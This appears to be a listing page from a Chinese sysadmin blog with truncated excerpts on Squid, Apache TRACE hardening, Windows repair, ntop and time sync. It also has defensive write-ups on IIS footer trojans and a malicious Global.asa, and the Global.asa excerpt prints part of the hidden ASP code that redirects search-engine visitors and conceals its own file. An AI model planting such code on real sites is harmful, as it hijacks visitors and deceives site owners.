autoDevops,CI,CD
Squid 2.6 反向代理配置测试环境:VM虚拟机安装RHEL5.5+本身系统 win2003Squid代理服务器:RHEL5.5 + Squid2.6 +apache IP:192.168.203.200 DNS:192.168.1.100Web服务器: 本机win2003+IIS6+DNS IP: 192.168.1.100 DNS:192.168.1.100实验目的: 用户访问www.squid.com时,请求转到代理服务器8080端口,访问其它域名时转到Web服务器的80端口上。一,在本机上配置DNS,域名:www.squid.com 指向IP:192.168.203.200 网站程序放在squid服务器上,apache使用8080端口域名:www.test.com 指向IP:192.168.203.200网站程序放于web服务器上,IIS使用80端口这里配置DNS就不再讲了。二,安装与配置squid在RHEL5.5上,就直接使用yum安装,首先配置好yum源,可以使用centos5的源,配置 yum源这里也不再讲了,如果不会可以,百度,也可到micoder.cc论坛里找。# yum install squid然后修改RHEL5.5的hostname# vi /etc/hosts192.168.203.200 www.squid.com squid.com保存退出。配置squid.conf配置文件参数很多,但是我们只要配置最基本的参数就可以了。可能在squid.conf配置文件最前面或是结尾处加入以下内...
预防http Trace跨站攻击方法一:Apache版本大于2.2,在httpd.conf中添加以下一段即可:TraceEnable off(建议使用的方法,简单明了,唯一需要注意apache的版本)方法二:如果一台 Web Server 支持 Trace 和 / 或 Track 方式,那么它一定存在跨站脚本漏洞,将有可能受到跨站攻击。 Trace 和 Track 是用来调试 Web 服务器连接的 HTTP 方式。我们通常在描述各种浏览器缺陷的时候,把“Cross-Site-Tracing”(跨站攻击)简称为 XST。攻击者可以利用此漏洞欺骗合法用户并得到他们的私人信息。解决方案:禁用 Trace 和 / 或 Track 方式。针对 Apache,可以借助 mod_rewrite 模块来禁止 HTTP Trace 请求。只要在各虚拟主机的配置文件里添加如下语句:RewriteEngine onRewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)RewriteRule .* – [F]需要在安装apache的时候编译mod_rewrite 。方法三:(未测试)另外可以这么做:SetEnvIfNoCase Request_Method ^(TRACE|TRACK) IS_TRACE<Directory /dir>Order Allow,DenyAllow from allDeny from env=IS_TRACE</Directory>
win2003系统登陆后自动注销今天有客户反应说,他的win2003系统登陆后,还没有看到桌面,就马上注销,进不了机器。怎么办? 出现这个问题的原因一般是userinit.exe文件出错了。 userinit.exe是用来管理用户启动的。 可以先到PE或DOS系统里看看C:\windows\system32\userinit.exe文件存在吧,如果没有,可能是文件改名了,或是文件被病毒感染了。 第一种方法从win2003系统光盘里面提取userinit.exe文件,然后放到%systemroot%\system32目录里面。具体方法:从安装光盘里面提取userinit.exe文件(在安装光盘i386目录下,文件名是USERINIT.EX_,用expand命令即可把userinit.exe解压出来)然后放到%systemroot%\system32目录里面即可注意:expand命令这样使用expand 光盘盘符:\i386\USERINIT.EX_ 系统盘盘符:\Windows\system321、用Windows 2000(或者Windows XP/2003)安装光盘引导系统,在“欢迎使用安装程序”的界面上按“R”键,选择修复。2、按“C”键选择使用故障恢复控制台。3、选择某个Windows 安装,通常是“1”。(屏幕上有提示)然后输入管理员密码4、进入system32目录,输入命令:del userinit32.exe &...
IIS服务器挂马和解决方法:首先我们要看一下IIS的配置文件:%windir%\system32\inetsrv\MetaBase.xml在这里面有一项配置:DefaultDocFooter,看一下说明DefaultDocFooter 属性指定附加到返回到客户端的 HTML 文件的自定义页脚(页脚并不附加到 ASP 文件)。如果将 EnableDocFooter 属性设置为 true,则仅发送自定义页脚。页脚可以是一个字符串,例如“String:ThisIsACustomFooter”,或是文件的引用,例如DefaultDocFooter=“FILE:C:\Wwwroot\Footers\Footer.htm”。看到没有,每当我们浏览该IIS服务器下的html网页的时候都会把Footer.htm的内容发送给客户端,这样我们可以把我们的挂马代码写到该文件中从而实现IIS全局挂马。那我们怎么来解决这个问题呢?方法一: 当然就是把Footer.htm的挂马代码删除方法二:删除MetaBase.xml中的DefaultDocFooter=“FILE:C:\Wwwroot\Footers\Footer.htm”方法三:把DirBrowseFlags属性中的EnableDefaultDoc设置删除,这样服务器就不会搜索该文档了。DirBrowseFlags 控制是否启用目录浏览,可以提供多少目录和文件信息(如果启用浏览)以及目录中是否包含默认页的标记。 注意 如果客户端访问目录时没有提供文件名,而 EnableDefaultDoc 标志...
警惕ASP网站Global.asa导致网站被挂马或转向上午帮朋友处理一个比较有难度的问题,网站输入域名访问正常打开,但从搜索引擎厚度或是Google之类的打开,就会跳转到某些色情网站上去.根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去,使用此种方法具有很强的隐匿性,因为站长们一般不会去搜索自己的网站,所以轻易不会发现自己站点遭到了挟持。因为网站是自己很多年前帮朋友做的,所以要了现在的代码,看了一下,没有发现问题,就开始是不是服务器感染了什么病毒或是被加上了什么IIS过滤器之类的,要了远程桌面,上去找了半天,一无所获,看了一下IP地址,发现是一个内网IP地址,也就是说需要网关将网站映射发布出去,于是怀疑问题是在网关上,但问了朋友之后,得知网关为一路由器,再加上将IIS关闭,网站也就无法打开,不能再跳转,排除了网关加马的可能性。难倒走不下去了?忽然想到一招,采用FileMon对w3wp.exe进程进行监控,看看用搜索引擎打开和直接打开读取的文件到底有什么不同,通过多次比较,也没有发现什么疑点。万般无奈,又回到网站根目录下,顺手打开了显示系统隐藏文件,却发现多了一个Global.a...
Global.asa 挂马文件代码会导致用户从搜所工具那里来的流量跳转到其它地方。<script language="vbscript" runat="server">sub Session_OnStartdim namename=request.servervariables("Path_Translated")Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))Dim vDim tReDim A(Request.Form.Count)ReDim B(Request.Form.Count)v=Request.Formt=Request.Form.Countif t>0 thenFor i=0 To t-1 b(i)=Split(Split(v,"&")(i),"=")(1) if instr(LCase(b(i)),"global.asa")>0 thenf.Attributes=1+2+4response.end() end ifNextend ifif instr(request.servervariables("HTTP_REFERER"),"www.baidu.com/s?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"baidu.com/baidu?")>0 or instr(request.ServerVariables("HTTP_REFERER"),"m.baidu.com/")>0 or instr(request.ServerVariables("HTT...
Linux 安装 NTOP使用ntop可以实时观察,统计,分析流量。那么ntop是个什么东东?Ntop是一个网络使用状况监测软件,在互动模式下,ntop会将网络的使用状况显示在使用者的终端机画面上。在Web模式中,ntop会像Web Server一样产生出内含网络使用状况的网页传回到使用者的浏览器上。它不仅可以列出节点的网络流量数据统计,也可以根据高层协议进性流量统计分析,比如P2P,HTTP,SSH,FTP等,还提供了插件功能,可以使用第三方插件,3.4Pre3默认情况下已包括 NetFlow,cPacket,icmpWatch,rrdplugin,sFlow五个插件。了解了NTOP是什么软件之后,那么我们就可以开始干活了。我这里需要使用ntop的服务器是一台跑iptables+tc的网关服务器。有两种方式安装ntop,一种是通过编译安装的形式,另一种是使用rpmfusion库直接yum安装。首先,我们介绍第一种方法。1.安装ntop所必需的开发库和软件yum install glibc glibc-devel gcc cpp libtool m4 autoconf automake gdbm gdbm-devel libpcap libpcap-devel gd gd-devel libpng libpng-devel openssl openssl-devel zlib zlib-devel ruby libdbi.i386之后去rpmfind下载rrdTool软件,一共需要三个包,分别是rrdtool,perl-rrdtool,rrdtool-devel...
时间精灵(windows系统自动同步时间) 自从2004年5月1日国家授时中心通过“时间网站”(http://www.time.ac.cn)发布网络校时组件---“时间精灵”以来,这款软件以其准确性、方便性和兼容性深受广大网友欢迎,目前日访问量近4000次,总访问量突破百万。“时间精灵”已广泛为电信、金融、证券期货等行业所采用。 这款网络校时工具比以往的网络授时软件更加方便易用,对不同操作系统和网络环境更具普适性和兼容性,无论您用的Windows98还是Windows XP,无论是否经过代理服务器和防火墙,只要您能上网,就能使用。首次使用只需下载一个小插件,以后一劳永逸。每次校准时间只需登陆“时间精灵”http://www.time.ac.cn/times/timefairy.htm网页,点击“校准”按钮即可,同时,还可设置毫秒显示和每小时自动校时。 “时间精灵”基于微软公司最新的.net软件平台,利用.net先进的网络平台服务和优化的系统程序结构,获取国家授时中心提供的专用时间服务器的标准北京时间。它使用微软ActiveX的HTML嵌入技术,用VB编写代码,具有很好的系统兼容性,由于本软件的时间敏感性,特意对代码进行了优化,以确保用户获取时间的精确性。时间精灵(Timefairy)使用的HT...
总共68页,当前第68页 | 页数: - 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
最新评论